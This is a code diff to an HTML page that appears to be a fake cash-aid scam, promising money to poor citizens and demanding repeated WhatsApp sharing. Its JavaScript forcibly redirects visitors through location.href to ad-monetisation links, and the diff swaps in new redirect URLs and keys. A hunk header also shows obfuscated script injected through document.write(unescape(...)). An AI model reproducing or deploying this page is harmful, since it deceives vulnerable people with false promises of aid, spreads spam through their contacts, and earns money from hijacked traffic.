--- a/main file.html
+++ b/main file.html
@@ -589,7 +589,7 @@ $(document).click(function () {
             text2 = " an amount of ",
             text3 = " for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
-            abcde = "https://www.highcpmrevenuenetwork.com/z6x3ek4q?key=90a19fd85bd1805f3b143c47a73389f5",
+            abcde = "https://www.highrevenuegate.com/znzbtg3g?key=576f81dab20b04e5877db5881b7d6502",
             saved = "",
             share = "whatsapp://send?text=" + text1;
     </script>
@@ -613,10 +613,10 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://www.highcpmrevenuenetwork.com/z6x3ek4q?key=90a19fd85bd1805f3b143c47a73389f5";
+        location.href="https://www.highrevenuegate.com/znzbtg3g?key=576f81dab20b04e5877db5881b7d6502";
     }
     function goon(){
-        location.href="https://www.highcpmrevenuenetwork.com/z6x3ek4q?key=90a19fd85bd1805f3b143c47a73389f5";
+        location.href="https://www.highrevenuegate.com/znzbtg3g?key=576f81dab20b04e5877db5881b7d6502";
     }
 </script>
 
